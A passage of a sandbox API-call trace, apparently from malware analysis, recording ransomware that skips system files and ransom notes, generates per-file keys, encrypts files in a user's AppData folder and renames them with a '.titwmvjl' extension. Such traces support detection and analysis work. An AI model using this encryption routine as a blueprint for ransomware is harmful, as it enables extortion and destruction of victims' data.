F84hgjL.gif", lpString2="iconcache.db") returned -1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="bootsect.bak") returned 1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="boot.ini") returned 1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="ntuser.dat.log") returned -1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="thumbs.db") returned -1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="CRAB-DECRYPT.html") returned 1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="ntldr") returned -1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="NTDETECT.COM") returned -1 [0070.097] lstrcmpiW (lpString1="H0n8vfZP F84hgjL.gif", lpString2="Bootfont.bin") returned 1 [0070.097] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif") returned 58 [0070.097] lstrlenW (lpString=".gif") returned 4 [0070.097] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.097] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".gif ") returned 5 [0070.097] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.098] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.098] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\h0n8vfzp f84hgjl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.098] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.098] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.099] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.099] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.099] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.099] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.100] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.100] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.100] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.100] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.100] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.101] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.101] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.101] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.101] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.101] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.101] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.101] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.101] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.102] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.102] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503738) returned 1 [0070.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.102] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.102] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.103] GetLastError () returned 0x0 [0070.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.103] CryptDestroyKey (hKey=0x503738) returned 1 [0070.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.103] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.103] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.104] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503738) returned 1 [0070.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.104] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.104] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.104] GetLastError () returned 0x0 [0070.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.104] CryptDestroyKey (hKey=0x503738) returned 1 [0070.104] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.105] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.105] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.105] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.105] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x3275, lpOverlapped=0x0) returned 1 [0070.110] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffcd8b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.111] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x3275, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x3275, lpOverlapped=0x0) returned 1 [0070.112] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.112] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.113] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.117] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.117] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.118] CloseHandle (hObject=0x2b4) returned 1 [0070.119] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\h0n8vfzp f84hgjl.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\H0n8vfZP F84hgjL.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\h0n8vfzp f84hgjl.gif.titwmvjl"), dwFlags=0x1) returned 1 [0070.119] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.120] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.120] lstrcmpW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2=".") returned 1 [0070.120] lstrcmpW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="..") returned 1 [0070.120] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="HcoyADAi5Sbnxpj.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv" [0070.120] lstrlenW (lpString=".titwmvjl") returned 9 [0070.120] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv") returned 57 [0070.120] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.120] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv.titwmvjl") returned 66 [0070.120] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv") returned 57 [0070.120] lstrlenW (lpString=".mkv") returned 4 [0070.120] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.120] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".mkv ") returned 5 [0070.120] lstrcmpiW (lpString1=".mkv", lpString2=".titwmvjl") returned -1 [0070.120] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.120] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv") returned 57 [0070.120] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv") returned 57 [0070.120] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="desktop.ini") returned 1 [0070.120] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="autorun.inf") returned 1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="ntuser.dat") returned -1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="iconcache.db") returned -1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="bootsect.bak") returned 1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="boot.ini") returned 1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="ntuser.dat.log") returned -1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="thumbs.db") returned -1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="CRAB-DECRYPT.html") returned 1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="ntldr") returned -1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="NTDETECT.COM") returned -1 [0070.121] lstrcmpiW (lpString1="HcoyADAi5Sbnxpj.mkv", lpString2="Bootfont.bin") returned 1 [0070.121] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv") returned 57 [0070.121] lstrlenW (lpString=".mkv") returned 4 [0070.121] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.121] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".mkv ") returned 5 [0070.121] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.121] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.121] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\hcoyadai5sbnxpj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0070.122] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.122] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0070.122] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.122] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.123] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.123] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.123] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.123] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0070.123] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.123] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.123] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.124] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0070.124] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.124] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.124] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.124] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0070.124] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.125] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.125] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.125] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.125] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5034b8) returned 1 [0070.125] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.126] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.126] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.126] GetLastError () returned 0x0 [0070.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.126] CryptDestroyKey (hKey=0x5034b8) returned 1 [0070.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.126] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.126] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0070.127] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.127] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503478) returned 1 [0070.127] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.127] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0070.127] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.127] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0070.128] GetLastError () returned 0x0 [0070.128] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.128] CryptDestroyKey (hKey=0x503478) returned 1 [0070.128] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.128] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.128] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.128] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.129] ReadFile (in: hFile=0x2b4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259f1dc*=0x495b, lpOverlapped=0x0) returned 1 [0070.134] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffb6a5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.134] WriteFile (in: hFile=0x2b4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x495b, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259f1c0*=0x495b, lpOverlapped=0x0) returned 1 [0070.135] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.135] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0070.137] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.140] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.140] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.141] CloseHandle (hObject=0x2b4) returned 1 [0070.142] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\hcoyadai5sbnxpj.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\HcoyADAi5Sbnxpj.mkv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\hcoyadai5sbnxpj.mkv.titwmvjl"), dwFlags=0x1) returned 1 [0070.143] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.143] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.143] lstrcmpW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2=".") returned 1 [0070.143] lstrcmpW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="..") returned 1 [0070.143] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="hIy5P_SVmm4d C3.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx" [0070.143] lstrlenW (lpString=".titwmvjl") returned 9 [0070.143] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx") returned 58 [0070.143] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.144] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx.titwmvjl") returned 67 [0070.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx") returned 58 [0070.144] lstrlenW (lpString=".xlsx") returned 5 [0070.144] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.144] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xlsx ") returned 6 [0070.144] lstrcmpiW (lpString1=".xlsx", lpString2=".titwmvjl") returned 1 [0070.144] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx") returned 58 [0070.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx") returned 58 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="desktop.ini") returned 1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="autorun.inf") returned 1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="ntuser.dat") returned -1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="iconcache.db") returned -1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="bootsect.bak") returned 1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="boot.ini") returned 1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="ntuser.dat.log") returned -1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="thumbs.db") returned -1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="KRAB-DECRYPT.html") returned -1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="CRAB-DECRYPT.html") returned 1 [0070.144] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.145] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.145] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="ntldr") returned -1 [0070.145] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="NTDETECT.COM") returned -1 [0070.145] lstrcmpiW (lpString1="hIy5P_SVmm4d C3.xlsx", lpString2="Bootfont.bin") returned 1 [0070.145] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\hIy5P_SVmm4d C3.xlsx") returned 58 [0070.145] lstrlenW (lpString=".xlsx") returned 5 [0070.145] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.145] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0070.145] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.145] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.145] 